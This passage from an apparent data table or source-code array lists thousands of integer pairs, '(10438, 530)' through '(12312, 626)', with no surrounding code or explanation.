(10438, 530),
(10439, 531),
(10440, 531),
(10441, 531),
(10442, 531),
(10443, 531),
(10444, 531),
(10445, 532),
(10446, 532),
(10447, 532),
(10448, 532),
(10449, 532),
(10450, 532),
(10451, 533),
(10452, 533),
(10453, 533),
(10454, 533),
(10455, 533),
(10456, 533),
(10457, 534),
(10458, 534),
(10459, 534),
(10460, 534),
(10461, 534),
(10462, 534),
(10463, 535),
(10464, 535),
(10465, 535),
(10466, 535),
(10467, 535),
(10468, 535),
(10469, 536),
(10470, 536),
(10471, 536),
(10472, 536),
(10473, 536),
(10474, 536),
(10475, 537),
(10476, 537),
(10477, 537),
(10478, 537),
(10479, 537),
(10480, 537),
(10481, 538),
(10482, 538),
(10483, 538),
(10484, 538),
(10485, 538),
(10486, 538),
(10487, 539),
(10488, 539),
(10489, 539),
(10490, 539),
(10491, 539),
(10492, 539),
(10493, 539),
(10494, 539),
(10495, 539),
(10496, 540),
(10497, 540),
(10498, 540),
(10499, 540),
(10500, 540),
(10501, 540),
(10502, 541),
(10503, 541),
(10504, 541),
(10505, 541),
(10506, 541),
(10507, 541),
(10508, 542),
(10509, 542),
(10510, 542),
(10511, 542),
(10512, 542),
(10513, 542),
(10514, 543),
(10515, 543),
(10516, 543),
(10517, 543),
(10518, 543),
(10519, 543),
(10520, 544),
(10521, 544),
(10522, 544),
(10523, 544),
(10524, 544),
(10525, 544),
(10526, 545),
(10527, 545),
(10528, 545),
(10529, 545),
(10530, 545),
(10531, 545),
(10532, 546),
(10533, 546),
(10534, 546),
(10535, 546),
(10536, 546),
(10537, 546),
(10538, 547),
(10539, 547),
(10540, 547),
(10541, 547),
(10542, 547),
(10543, 547),
(10544, 548),
(10545, 548),
(10546, 548),
(10547, 548),
(10548, 548),
(10549, 548),
(10550, 549),
(10551, 549),
(10552, 549),
(10553, 549),
(10554, 549),
(10555, 549),
(10556, 550),
(10557, 550),
(10558, 550),
(10559, 550),
(10560, 550),
(10561, 550),
(10562, 551),
(10563, 551),
(10564, 551),
(10565, 551),
(10566, 551),
(10567, 551),
(10568, 552),
(10569, 552),
(10570, 552),
(10571, 552),
(10572, 552),
(10573, 552),
(10574, 553),
(10575, 553),
(10576, 553),
(10577, 553),
(10578, 553),
(10579, 553),
(10580, 554),
(10581, 554),
(10582, 554),
(10583, 554),
(10584, 554),
(10585, 554),
(10586, 555),
(10587, 555),
(10588, 555),
(10589, 555),
(10590, 555),
(10591, 555),
(10592, 555),
(10593, 555),
(10594, 555),
(10595, 556),
(10596, 556),
(10597, 556),
(10598, 556),
(10599, 556),
(10600, 556),
(10601, 557),
(10602, 557),
(10603, 557),
(10604, 557),
(10605, 557),
(10606, 557),
(10607, 558),
(10608, 558),
(10609, 558),
(10610, 558),
(10611, 558),
(10612, 558),
(10613, 559),
(10614, 559),
(10615, 559),
(10616, 559),
(10617, 559),
(10618, 559),
(10619, 460),
(10620, 460),
(10621, 461),
(10622, 461),
(10623, 462),
(10624, 462),
(10625, 463),
(10626, 463),
(10627, 464),
(10628, 464),
(10629, 465),
(10630, 465),
(10631, 466),
(10632, 466),
(10633, 467),
(10634, 467),
(10635, 468),
(10636, 468),
(10637, 469),
(10638, 469),
(10639, 470),
(10640, 470),
(10641, 471),
(10642, 471),
(10643, 472),
(10644, 472),
(10645, 473),
(10646, 473),
(10647, 474),
(10648, 474),
(10649, 475),
(10650, 476),
(10651, 476),
(10652, 477),
(10653, 477),
(10654, 478),
(10655, 478),
(10656, 479),
(10657, 479),
(10658, 480),
(10659, 480),
(10660, 481),
(10661, 481),
(10662, 482),
(10663, 482),
(10664, 483),
(10665, 483),
(10666, 484),
(10667, 484),
(10668, 485),
(10669, 485),
(10670, 486),
(10671, 486),
(10672, 487),
(10673, 487),
(10674, 488),
(10675, 488),
(10676, 489),
(10677, 489),
(10678, 490),
(10679, 490),
(10680, 491),
(10681, 492),
(10682, 492),
(10683, 493),
(10684, 493),
(10685, 494),
(10686, 494),
(10687, 495),
(10688, 495),
(10689, 496),
(10690, 496),
(10691, 497),
(10692, 497),
(10693, 498),
(10694, 498),
(10695, 499),
(10696, 499),
(10697, 500),
(10698, 500),
(10699, 501),
(10700, 501),
(10701, 502),
(10702, 502),
(10703, 503),
(10704, 503),
(10705, 504),
(10706, 504),
(10707, 505),
(10708, 505),
(10709, 506),
(10710, 506),
(10711, 507),
(10712, 508),
(10713, 508),
(10714, 509),
(10715, 509),
(10716, 510),
(10717, 510),
(10718, 511),
(10719, 511),
(10720, 512),
(10721, 512),
(10722, 513),
(10723, 513),
(10724, 514),
(10725, 514),
(10726, 515),
(10727, 515),
(10728, 516),
(10729, 516),
(10730, 517),
(10731, 517),
(10732, 518),
(10733, 518),
(10734, 519),
(10735, 519),
(10736, 520),
(10737, 520),
(10738, 521),
(10739, 521),
(10740, 522),
(10741, 522),
(10742, 523),
(10743, 524),
(10744, 524),
(10745, 525),
(10746, 525),
(10747, 526),
(10748, 526),
(10749, 527),
(10750, 527),
(10751, 528),
(10752, 528),
(10753, 529),
(10754, 529),
(10755, 530),
(10756, 530),
(10757, 531),
(10758, 531),
(10759, 532),
(10760, 532),
(10761, 533),
(10762, 533),
(10763, 534),
(10764, 534),
(10765, 535),
(10766, 535),
(10767, 536),
(10768, 536),
(10769, 537),
(10770, 537),
(10771, 538),
(10772, 538),
(10773, 539),
(10774, 540),
(10775, 540),
(10776, 541),
(10777, 541),
(10778, 542),
(10779, 542),
(10780, 543),
(10781, 543),
(10782, 544),
(10783, 544),
(10784, 545),
(10785, 545),
(10786, 546),
(10787, 546),
(10788, 547),
(10789, 547),
(10790, 548),
(10791, 548),
(10792, 549),
(10793, 549),
(10794, 550),
(10795, 550),
(10796, 551),
(10797, 551),
(10798, 552),
(10799, 552),
(10800, 553),
(10801, 553),
(10802, 554),
(10803, 554),
(10804, 555),
(10805, 556),
(10806, 556),
(10807, 557),
(10808, 557),
(10809, 558),
(10810, 558),
(10811, 559),
(10812, 559),
(10813, 560),
(10814, 561),
(10815, 562),
(10816, 563),
(10817, 564),
(10818, 565),
(10819, 566),
(10820, 567),
(10821, 568),
(10822, 569),
(10823, 570),
(10824, 571),
(10825, 572),
(10826, 573),
(10827, 574),
(10828, 575),
(10829, 576),
(10830, 577),
(10831, 578),
(10832, 579),
(10833, 580),
(10834, 581),
(10835, 582),
(10836, 583),
(10837, 584),
(10838, 585),
(10839, 586),
(10840, 587),
(10841, 588),
(10842, 589),
(10843, 590),
(10844, 591),
(10845, 592),
(10846, 593),
(10847, 594),
(10848, 595),
(10849, 596),
(10850, 597),
(10851, 598),
(10852, 599),
(10853, 600),
(10854, 601),
(10855, 602),
(10856, 603),
(10857, 604),
(10858, 605),
(10859, 606),
(10860, 607),
(10861, 608),
(10862, 609),
(10863, 610),
(10864, 611),
(10865, 612),
(10866, 613),
(10867, 614),
(10868, 615),
(10869, 616),
(10870, 617),
(10871, 618),
(10872, 619),
(10873, 620),
(10874, 621),
(10875, 622),
(10876, 623),
(10877, 624),
(10878, 625),
(10879, 626),
(10880, 627),
(10881, 628),
(10882, 629),
(10883, 630),
(10884, 631),
(10885, 632),
(10886, 633),
(10887, 634),
(10888, 635),
(10889, 636),
(10890, 637),
(10891, 638),
(10892, 639),
(10893, 640),
(10894, 641),
(10895, 642),
(10896, 643),
(10897, 644),
(10898, 645),
(10899, 646),
(10900, 647),
(10901, 648),
(10902, 649),
(10903, 650),
(10904, 651),
(10905, 652),
(10906, 653),
(10907, 654),
(10908, 655),
(10909, 656),
(10910, 657),
(10911, 658),
(10912, 659),
(10913, 560),
(10914, 560),
(10915, 561),
(10916, 562),
(10917, 563),
(10918, 563),
(10919, 564),
(10920, 565),
(10921, 566),
(10922, 566),
(10923, 567),
(10924, 568),
(10925, 569),
(10926, 569),
(10927, 570),
(10928, 571),
(10929, 571),
(10930, 572),
(10931, 573),
(10932, 574),
(10933, 574),
(10934, 574),
(10935, 575),
(10936, 576),
(10937, 577),
(10938, 577),
(10939, 577),
(10940, 578),
(10941, 579),
(10942, 580),
(10943, 580),
(10944, 580),
(10945, 581),
(10946, 582),
(10947, 583),
(10948, 583),
(10949, 583),
(10950, 584),
(10951, 585),
(10952, 586),
(10953, 586),
(10954, 586),
(10955, 587),
(10956, 587),
(10957, 587),
(10958, 588),
(10959, 589),
(10960, 589),
(10961, 589),
(10962, 590),
(10963, 591),
(10964, 592),
(10965, 592),
(10966, 592),
(10967, 593),
(10968, 594),
(10969, 595),
(10970, 595),
(10971, 595),
(10972, 596),
(10973, 597),
(10974, 598),
(10975, 598),
(10976, 598),
(10977, 599),
(10978, 600),
(10979, 601),
(10980, 601),
(10981, 601),
(10982, 602),
(10983, 603),
(10984, 603),
(10985, 603),
(10986, 604),
(10987, 605),
(10988, 605),
(10989, 605),
(10990, 606),
(10991, 607),
(10992, 608),
(10993, 608),
(10994, 608),
(10995, 609),
(10996, 610),
(10997, 611),
(10998, 611),
(10999, 611),
(11000, 612),
(11001, 613),
(11002, 614),
(11003, 614),
(11004, 614),
(11005, 615),
(11006, 616),
(11007, 617),
(11008, 617),
(11009, 617),
(11010, 618),
(11011, 619),
(11012, 619),
(11013, 619),
(11014, 620),
(11015, 620),
(11016, 621),
(11017, 622),
(11018, 623),
(11019, 623),
(11020, 624),
(11021, 625),
(11022, 626),
(11023, 626),
(11024, 627),
(11025, 628),
(11026, 629),
(11027, 629),
(11028, 630),
(11029, 631),
(11030, 632),
(11031, 632),
(11032, 633),
(11033, 634),
(11034, 635),
(11035, 635),
(11036, 636),
(11037, 637),
(11038, 638),
(11039, 638),
(11040, 638),
(11041, 639),
(11042, 640),
(11043, 641),
(11044, 641),
(11045, 641),
(11046, 642),
(11047, 643),
(11048, 644),
(11049, 644),
(11050, 644),
(11051, 645),
(11052, 646),
(11053, 647),
(11054, 647),
(11055, 647),
(11056, 648),
(11057, 649),
(11058, 650),
(11059, 650),
(11060, 650),
(11061, 651),
(11062, 651),
(11063, 651),
(11064, 652),
(11065, 653),
(11066, 654),
(11067, 654),
(11068, 654),
(11069, 654),
(11070, 655),
(11071, 656),
(11072, 657),
(11073, 657),
(11074, 657),
(11075, 657),
(11076, 658),
(11077, 659),
(11078, 560),
(11079, 560),
(11080, 560),
(11081, 560),
(11082, 560),
(11083, 560),
(11084, 560),
(11085, 561),
(11086, 561),
(11087, 561),
(11088, 561),
(11089, 561),
(11090, 561),
(11091, 561),
(11092, 562),
(11093, 562),
(11094, 562),
(11095, 562),
(11096, 562),
(11097, 562),
(11098, 562),
(11099, 563),
(11100, 563),
(11101, 563),
(11102, 563),
(11103, 563),
(11104, 563),
(11105, 563),
(11106, 564),
(11107, 564),
(11108, 564),
(11109, 564),
(11110, 564),
(11111, 564),
(11112, 564),
(11113, 565),
(11114, 565),
(11115, 565),
(11116, 565),
(11117, 565),
(11118, 565),
(11119, 565),
(11120, 566),
(11121, 566),
(11122, 566),
(11123, 566),
(11124, 566),
(11125, 566),
(11126, 566),
(11127, 567),
(11128, 567),
(11129, 567),
(11130, 567),
(11131, 567),
(11132, 567),
(11133, 567),
(11134, 568),
(11135, 568),
(11136, 568),
(11137, 568),
(11138, 568),
(11139, 568),
(11140, 568),
(11141, 569),
(11142, 569),
(11143, 569),
(11144, 569),
(11145, 569),
(11146, 569),
(11147, 569),
(11148, 570),
(11149, 570),
(11150, 570),
(11151, 570),
(11152, 570),
(11153, 570),
(11154, 570),
(11155, 571),
(11156, 571),
(11157, 571),
(11158, 571),
(11159, 571),
(11160, 571),
(11161, 571),
(11162, 571),
(11163, 571),
(11164, 571),
(11165, 571),
(11166, 572),
(11167, 572),
(11168, 572),
(11169, 572),
(11170, 572),
(11171, 572),
(11172, 572),
(11173, 573),
(11174, 573),
(11175, 573),
(11176, 573),
(11177, 573),
(11178, 573),
(11179, 573),
(11180, 574),
(11181, 574),
(11182, 574),
(11183, 574),
(11184, 574),
(11185, 574),
(11186, 574),
(11187, 575),
(11188, 575),
(11189, 575),
(11190, 575),
(11191, 575),
(11192, 575),
(11193, 575),
(11194, 576),
(11195, 576),
(11196, 576),
(11197, 576),
(11198, 576),
(11199, 576),
(11200, 576),
(11201, 577),
(11202, 577),
(11203, 577),
(11204, 577),
(11205, 577),
(11206, 577),
(11207, 577),
(11208, 578),
(11209, 578),
(11210, 578),
(11211, 578),
(11212, 578),
(11213, 578),
(11214, 578),
(11215, 579),
(11216, 579),
(11217, 579),
(11218, 579),
(11219, 579),
(11220, 579),
(11221, 579),
(11222, 580),
(11223, 580),
(11224, 580),
(11225, 580),
(11226, 580),
(11227, 580),
(11228, 580),
(11229, 581),
(11230, 581),
(11231, 581),
(11232, 581),
(11233, 581),
(11234, 581),
(11235, 581),
(11236, 582),
(11237, 582),
(11238, 582),
(11239, 582),
(11240, 582),
(11241, 582),
(11242, 582),
(11243, 583),
(11244, 583),
(11245, 583),
(11246, 583),
(11247, 583),
(11248, 583),
(11249, 583),
(11250, 584),
(11251, 584),
(11252, 584),
(11253, 584),
(11254, 584),
(11255, 584),
(11256, 584),
(11257, 585),
(11258, 585),
(11259, 585),
(11260, 585),
(11261, 585),
(11262, 585),
(11263, 585),
(11264, 586),
(11265, 586),
(11266, 586),
(11267, 586),
(11268, 586),
(11269, 586),
(11270, 586),
(11271, 587),
(11272, 587),
(11273, 587),
(11274, 587),
(11275, 587),
(11276, 587),
(11277, 587),
(11278, 587),
(11279, 587),
(11280, 587),
(11281, 587),
(11282, 588),
(11283, 588),
(11284, 588),
(11285, 588),
(11286, 588),
(11287, 588),
(11288, 588),
(11289, 589),
(11290, 589),
(11291, 589),
(11292, 589),
(11293, 589),
(11294, 589),
(11295, 589),
(11296, 590),
(11297, 590),
(11298, 590),
(11299, 590),
(11300, 590),
(11301, 590),
(11302, 590),
(11303, 591),
(11304, 591),
(11305, 591),
(11306, 591),
(11307, 591),
(11308, 591),
(11309, 591),
(11310, 592),
(11311, 592),
(11312, 592),
(11313, 592),
(11314, 592),
(11315, 592),
(11316, 592),
(11317, 593),
(11318, 593),
(11319, 593),
(11320, 593),
(11321, 593),
(11322, 593),
(11323, 593),
(11324, 594),
(11325, 594),
(11326, 594),
(11327, 594),
(11328, 594),
(11329, 594),
(11330, 594),
(11331, 595),
(11332, 595),
(11333, 595),
(11334, 595),
(11335, 595),
(11336, 595),
(11337, 595),
(11338, 596),
(11339, 596),
(11340, 596),
(11341, 596),
(11342, 596),
(11343, 596),
(11344, 596),
(11345, 597),
(11346, 597),
(11347, 597),
(11348, 597),
(11349, 597),
(11350, 597),
(11351, 597),
(11352, 598),
(11353, 598),
(11354, 598),
(11355, 598),
(11356, 598),
(11357, 598),
(11358, 598),
(11359, 599),
(11360, 599),
(11361, 599),
(11362, 599),
(11363, 599),
(11364, 599),
(11365, 599),
(11366, 600),
(11367, 600),
(11368, 600),
(11369, 600),
(11370, 600),
(11371, 600),
(11372, 600),
(11373, 601),
(11374, 601),
(11375, 601),
(11376, 601),
(11377, 601),
(11378, 601),
(11379, 601),
(11380, 602),
(11381, 602),
(11382, 602),
(11383, 602),
(11384, 602),
(11385, 602),
(11386, 602),
(11387, 603),
(11388, 603),
(11389, 603),
(11390, 603),
(11391, 603),
(11392, 603),
(11393, 603),
(11394, 603),
(11395, 603),
(11396, 603),
(11397, 603),
(11398, 604),
(11399, 604),
(11400, 604),
(11401, 604),
(11402, 604),
(11403, 604),
(11404, 604),
(11405, 605),
(11406, 605),
(11407, 605),
(11408, 605),
(11409, 605),
(11410, 605),
(11411, 605),
(11412, 606),
(11413, 606),
(11414, 606),
(11415, 606),
(11416, 606),
(11417, 606),
(11418, 606),
(11419, 607),
(11420, 607),
(11421, 607),
(11422, 607),
(11423, 607),
(11424, 607),
(11425, 607),
(11426, 608),
(11427, 608),
(11428, 608),
(11429, 608),
(11430, 608),
(11431, 608),
(11432, 608),
(11433, 609),
(11434, 609),
(11435, 609),
(11436, 609),
(11437, 609),
(11438, 609),
(11439, 609),
(11440, 610),
(11441, 610),
(11442, 610),
(11443, 610),
(11444, 610),
(11445, 610),
(11446, 610),
(11447, 611),
(11448, 611),
(11449, 611),
(11450, 611),
(11451, 611),
(11452, 611),
(11453, 611),
(11454, 612),
(11455, 612),
(11456, 612),
(11457, 612),
(11458, 612),
(11459, 612),
(11460, 612),
(11461, 613),
(11462, 613),
(11463, 613),
(11464, 613),
(11465, 613),
(11466, 613),
(11467, 613),
(11468, 614),
(11469, 614),
(11470, 614),
(11471, 614),
(11472, 614),
(11473, 614),
(11474, 614),
(11475, 615),
(11476, 615),
(11477, 615),
(11478, 615),
(11479, 615),
(11480, 615),
(11481, 615),
(11482, 616),
(11483, 616),
(11484, 616),
(11485, 616),
(11486, 616),
(11487, 616),
(11488, 616),
(11489, 617),
(11490, 617),
(11491, 617),
(11492, 617),
(11493, 617),
(11494, 617),
(11495, 617),
(11496, 618),
(11497, 618),
(11498, 618),
(11499, 618),
(11500, 618),
(11501, 618),
(11502, 618),
(11503, 619),
(11504, 619),
(11505, 619),
(11506, 619),
(11507, 619),
(11508, 619),
(11509, 619),
(11510, 619),
(11511, 619),
(11512, 619),
(11513, 619),
(11514, 620),
(11515, 620),
(11516, 620),
(11517, 620),
(11518, 620),
(11519, 620),
(11520, 620),
(11521, 621),
(11522, 621),
(11523, 621),
(11524, 621),
(11525, 621),
(11526, 621),
(11527, 621),
(11528, 622),
(11529, 622),
(11530, 622),
(11531, 622),
(11532, 622),
(11533, 622),
(11534, 622),
(11535, 623),
(11536, 623),
(11537, 623),
(11538, 623),
(11539, 623),
(11540, 623),
(11541, 623),
(11542, 624),
(11543, 624),
(11544, 624),
(11545, 624),
(11546, 624),
(11547, 624),
(11548, 624),
(11549, 625),
(11550, 625),
(11551, 625),
(11552, 625),
(11553, 625),
(11554, 625),
(11555, 625),
(11556, 626),
(11557, 626),
(11558, 626),
(11559, 626),
(11560, 626),
(11561, 626),
(11562, 626),
(11563, 627),
(11564, 627),
(11565, 627),
(11566, 627),
(11567, 627),
(11568, 627),
(11569, 627),
(11570, 628),
(11571, 628),
(11572, 628),
(11573, 628),
(11574, 628),
(11575, 628),
(11576, 628),
(11577, 629),
(11578, 629),
(11579, 629),
(11580, 629),
(11581, 629),
(11582, 629),
(11583, 629),
(11584, 630),
(11585, 630),
(11586, 630),
(11587, 630),
(11588, 630),
(11589, 630),
(11590, 630),
(11591, 631),
(11592, 631),
(11593, 631),
(11594, 631),
(11595, 631),
(11596, 631),
(11597, 631),
(11598, 632),
(11599, 632),
(11600, 632),
(11601, 632),
(11602, 632),
(11603, 632),
(11604, 632),
(11605, 633),
(11606, 633),
(11607, 633),
(11608, 633),
(11609, 633),
(11610, 633),
(11611, 633),
(11612, 634),
(11613, 634),
(11614, 634),
(11615, 634),
(11616, 634),
(11617, 634),
(11618, 634),
(11619, 635),
(11620, 635),
(11621, 635),
(11622, 635),
(11623, 635),
(11624, 635),
(11625, 635),
(11626, 635),
(11627, 635),
(11628, 635),
(11629, 635),
(11630, 636),
(11631, 636),
(11632, 636),
(11633, 636),
(11634, 636),
(11635, 636),
(11636, 636),
(11637, 637),
(11638, 637),
(11639, 637),
(11640, 637),
(11641, 637),
(11642, 637),
(11643, 637),
(11644, 638),
(11645, 638),
(11646, 638),
(11647, 638),
(11648, 638),
(11649, 638),
(11650, 638),
(11651, 639),
(11652, 639),
(11653, 639),
(11654, 639),
(11655, 639),
(11656, 639),
(11657, 639),
(11658, 640),
(11659, 640),
(11660, 640),
(11661, 640),
(11662, 640),
(11663, 640),
(11664, 640),
(11665, 641),
(11666, 641),
(11667, 641),
(11668, 641),
(11669, 641),
(11670, 641),
(11671, 641),
(11672, 642),
(11673, 642),
(11674, 642),
(11675, 642),
(11676, 642),
(11677, 642),
(11678, 642),
(11679, 643),
(11680, 643),
(11681, 643),
(11682, 643),
(11683, 643),
(11684, 643),
(11685, 643),
(11686, 644),
(11687, 644),
(11688, 644),
(11689, 644),
(11690, 644),
(11691, 644),
(11692, 644),
(11693, 645),
(11694, 645),
(11695, 645),
(11696, 645),
(11697, 645),
(11698, 645),
(11699, 645),
(11700, 646),
(11701, 646),
(11702, 646),
(11703, 646),
(11704, 646),
(11705, 646),
(11706, 646),
(11707, 647),
(11708, 647),
(11709, 647),
(11710, 647),
(11711, 647),
(11712, 647),
(11713, 647),
(11714, 648),
(11715, 648),
(11716, 648),
(11717, 648),
(11718, 648),
(11719, 648),
(11720, 648),
(11721, 649),
(11722, 649),
(11723, 649),
(11724, 649),
(11725, 649),
(11726, 649),
(11727, 649),
(11728, 650),
(11729, 650),
(11730, 650),
(11731, 650),
(11732, 650),
(11733, 650),
(11734, 650),
(11735, 651),
(11736, 651),
(11737, 651),
(11738, 651),
(11739, 651),
(11740, 651),
(11741, 651),
(11742, 651),
(11743, 651),
(11744, 651),
(11745, 651),
(11746, 652),
(11747, 652),
(11748, 652),
(11749, 652),
(11750, 652),
(11751, 652),
(11752, 652),
(11753, 653),
(11754, 653),
(11755, 653),
(11756, 653),
(11757, 653),
(11758, 653),
(11759, 653),
(11760, 654),
(11761, 654),
(11762, 654),
(11763, 654),
(11764, 654),
(11765, 654),
(11766, 654),
(11767, 655),
(11768, 655),
(11769, 655),
(11770, 655),
(11771, 655),
(11772, 655),
(11773, 655),
(11774, 656),
(11775, 656),
(11776, 656),
(11777, 656),
(11778, 656),
(11779, 656),
(11780, 656),
(11781, 657),
(11782, 657),
(11783, 657),
(11784, 657),
(11785, 657),
(11786, 657),
(11787, 657),
(11788, 658),
(11789, 658),
(11790, 658),
(11791, 658),
(11792, 658),
(11793, 658),
(11794, 658),
(11795, 659),
(11796, 659),
(11797, 659),
(11798, 659),
(11799, 659),
(11800, 659),
(11801, 659),
(11802, 560),
(11803, 561),
(11804, 562),
(11805, 563),
(11806, 564),
(11807, 565),
(11808, 566),
(11809, 567),
(11810, 568),
(11811, 569),
(11812, 570),
(11813, 571),
(11814, 572),
(11815, 573),
(11816, 574),
(11817, 575),
(11818, 576),
(11819, 577),
(11820, 578),
(11821, 579),
(11822, 580),
(11823, 581),
(11824, 582),
(11825, 583),
(11826, 584),
(11827, 585),
(11828, 586),
(11829, 587),
(11830, 588),
(11831, 589),
(11832, 590),
(11833, 591),
(11834, 592),
(11835, 593),
(11836, 594),
(11837, 595),
(11838, 596),
(11839, 597),
(11840, 598),
(11841, 599),
(11842, 600),
(11843, 601),
(11844, 602),
(11845, 603),
(11846, 604),
(11847, 605),
(11848, 606),
(11849, 607),
(11850, 608),
(11851, 609),
(11852, 610),
(11853, 611),
(11854, 612),
(11855, 613),
(11856, 614),
(11857, 615),
(11858, 616),
(11859, 617),
(11860, 618),
(11861, 619),
(11862, 620),
(11863, 621),
(11864, 622),
(11865, 623),
(11866, 624),
(11867, 625),
(11868, 626),
(11869, 627),
(11870, 628),
(11871, 629),
(11872, 630),
(11873, 631),
(11874, 632),
(11875, 633),
(11876, 634),
(11877, 635),
(11878, 636),
(11879, 637),
(11880, 638),
(11881, 639),
(11882, 640),
(11883, 641),
(11884, 642),
(11885, 643),
(11886, 644),
(11887, 645),
(11888, 646),
(11889, 647),
(11890, 648),
(11891, 649),
(11892, 650),
(11893, 651),
(11894, 652),
(11895, 653),
(11896, 654),
(11897, 655),
(11898, 656),
(11899, 657),
(11900, 658),
(11901, 659),
(11902, 560),
(11903, 560),
(11904, 560),
(11905, 560),
(11906, 560),
(11907, 560),
(11908, 561),
(11909, 561),
(11910, 561),
(11911, 561),
(11912, 561),
(11913, 561),
(11914, 562),
(11915, 562),
(11916, 562),
(11917, 562),
(11918, 562),
(11919, 562),
(11920, 563),
(11921, 563),
(11922, 563),
(11923, 563),
(11924, 563),
(11925, 563),
(11926, 564),
(11927, 564),
(11928, 564),
(11929, 564),
(11930, 564),
(11931, 564),
(11932, 565),
(11933, 565),
(11934, 565),
(11935, 565),
(11936, 565),
(11937, 565),
(11938, 566),
(11939, 566),
(11940, 566),
(11941, 566),
(11942, 566),
(11943, 566),
(11944, 567),
(11945, 567),
(11946, 567),
(11947, 567),
(11948, 567),
(11949, 567),
(11950, 568),
(11951, 568),
(11952, 568),
(11953, 568),
(11954, 568),
(11955, 568),
(11956, 569),
(11957, 569),
(11958, 569),
(11959, 569),
(11960, 569),
(11961, 569),
(11962, 570),
(11963, 570),
(11964, 570),
(11965, 570),
(11966, 570),
(11967, 570),
(11968, 571),
(11969, 571),
(11970, 571),
(11971, 571),
(11972, 571),
(11973, 571),
(11974, 571),
(11975, 571),
(11976, 571),
(11977, 572),
(11978, 572),
(11979, 572),
(11980, 572),
(11981, 572),
(11982, 572),
(11983, 573),
(11984, 573),
(11985, 573),
(11986, 573),
(11987, 573),
(11988, 573),
(11989, 574),
(11990, 574),
(11991, 574),
(11992, 574),
(11993, 574),
(11994, 574),
(11995, 575),
(11996, 575),
(11997, 575),
(11998, 575),
(11999, 575),
(12000, 575),
(12001, 576),
(12002, 576),
(12003, 576),
(12004, 576),
(12005, 576),
(12006, 576),
(12007, 577),
(12008, 577),
(12009, 577),
(12010, 577),
(12011, 577),
(12012, 577),
(12013, 578),
(12014, 578),
(12015, 578),
(12016, 578),
(12017, 578),
(12018, 578),
(12019, 579),
(12020, 579),
(12021, 579),
(12022, 579),
(12023, 579),
(12024, 579),
(12025, 580),
(12026, 580),
(12027, 580),
(12028, 580),
(12029, 580),
(12030, 580),
(12031, 581),
(12032, 581),
(12033, 581),
(12034, 581),
(12035, 581),
(12036, 581),
(12037, 582),
(12038, 582),
(12039, 582),
(12040, 582),
(12041, 582),
(12042, 582),
(12043, 583),
(12044, 583),
(12045, 583),
(12046, 583),
(12047, 583),
(12048, 583),
(12049, 584),
(12050, 584),
(12051, 584),
(12052, 584),
(12053, 584),
(12054, 584),
(12055, 585),
(12056, 585),
(12057, 585),
(12058, 585),
(12059, 585),
(12060, 585),
(12061, 586),
(12062, 586),
(12063, 586),
(12064, 586),
(12065, 586),
(12066, 586),
(12067, 587),
(12068, 587),
(12069, 587),
(12070, 587),
(12071, 587),
(12072, 587),
(12073, 587),
(12074, 587),
(12075, 587),
(12076, 588),
(12077, 588),
(12078, 588),
(12079, 588),
(12080, 588),
(12081, 588),
(12082, 589),
(12083, 589),
(12084, 589),
(12085, 589),
(12086, 589),
(12087, 589),
(12088, 590),
(12089, 590),
(12090, 590),
(12091, 590),
(12092, 590),
(12093, 590),
(12094, 591),
(12095, 591),
(12096, 591),
(12097, 591),
(12098, 591),
(12099, 591),
(12100, 592),
(12101, 592),
(12102, 592),
(12103, 592),
(12104, 592),
(12105, 592),
(12106, 593),
(12107, 593),
(12108, 593),
(12109, 593),
(12110, 593),
(12111, 593),
(12112, 594),
(12113, 594),
(12114, 594),
(12115, 594),
(12116, 594),
(12117, 594),
(12118, 595),
(12119, 595),
(12120, 595),
(12121, 595),
(12122, 595),
(12123, 595),
(12124, 596),
(12125, 596),
(12126, 596),
(12127, 596),
(12128, 596),
(12129, 596),
(12130, 597),
(12131, 597),
(12132, 597),
(12133, 597),
(12134, 597),
(12135, 597),
(12136, 598),
(12137, 598),
(12138, 598),
(12139, 598),
(12140, 598),
(12141, 598),
(12142, 599),
(12143, 599),
(12144, 599),
(12145, 599),
(12146, 599),
(12147, 599),
(12148, 600),
(12149, 600),
(12150, 600),
(12151, 600),
(12152, 600),
(12153, 600),
(12154, 601),
(12155, 601),
(12156, 601),
(12157, 601),
(12158, 601),
(12159, 601),
(12160, 602),
(12161, 602),
(12162, 602),
(12163, 602),
(12164, 602),
(12165, 602),
(12166, 603),
(12167, 603),
(12168, 603),
(12169, 603),
(12170, 603),
(12171, 603),
(12172, 603),
(12173, 603),
(12174, 603),
(12175, 604),
(12176, 604),
(12177, 604),
(12178, 604),
(12179, 604),
(12180, 604),
(12181, 605),
(12182, 605),
(12183, 605),
(12184, 605),
(12185, 605),
(12186, 605),
(12187, 606),
(12188, 606),
(12189, 606),
(12190, 606),
(12191, 606),
(12192, 606),
(12193, 607),
(12194, 607),
(12195, 607),
(12196, 607),
(12197, 607),
(12198, 607),
(12199, 608),
(12200, 608),
(12201, 608),
(12202, 608),
(12203, 608),
(12204, 608),
(12205, 609),
(12206, 609),
(12207, 609),
(12208, 609),
(12209, 609),
(12210, 609),
(12211, 610),
(12212, 610),
(12213, 610),
(12214, 610),
(12215, 610),
(12216, 610),
(12217, 611),
(12218, 611),
(12219, 611),
(12220, 611),
(12221, 611),
(12222, 611),
(12223, 612),
(12224, 612),
(12225, 612),
(12226, 612),
(12227, 612),
(12228, 612),
(12229, 613),
(12230, 613),
(12231, 613),
(12232, 613),
(12233, 613),
(12234, 613),
(12235, 614),
(12236, 614),
(12237, 614),
(12238, 614),
(12239, 614),
(12240, 614),
(12241, 615),
(12242, 615),
(12243, 615),
(12244, 615),
(12245, 615),
(12246, 615),
(12247, 616),
(12248, 616),
(12249, 616),
(12250, 616),
(12251, 616),
(12252, 616),
(12253, 617),
(12254, 617),
(12255, 617),
(12256, 617),
(12257, 617),
(12258, 617),
(12259, 618),
(12260, 618),
(12261, 618),
(12262, 618),
(12263, 618),
(12264, 618),
(12265, 619),
(12266, 619),
(12267, 619),
(12268, 619),
(12269, 619),
(12270, 619),
(12271, 619),
(12272, 619),
(12273, 619),
(12274, 620),
(12275, 620),
(12276, 620),
(12277, 620),
(12278, 620),
(12279, 620),
(12280, 621),
(12281, 621),
(12282, 621),
(12283, 621),
(12284, 621),
(12285, 621),
(12286, 622),
(12287, 622),
(12288, 622),
(12289, 622),
(12290, 622),
(12291, 622),
(12292, 623),
(12293, 623),
(12294, 623),
(12295, 623),
(12296, 623),
(12297, 623),
(12298, 624),
(12299, 624),
(12300, 624),
(12301, 624),
(12302, 624),
(12303, 624),
(12304, 625),
(12305, 625),
(12306, 625),
(12307, 625),
(12308, 625),
(12309, 625),
(12310, 626),
(12311, 626),
(12312, 626),
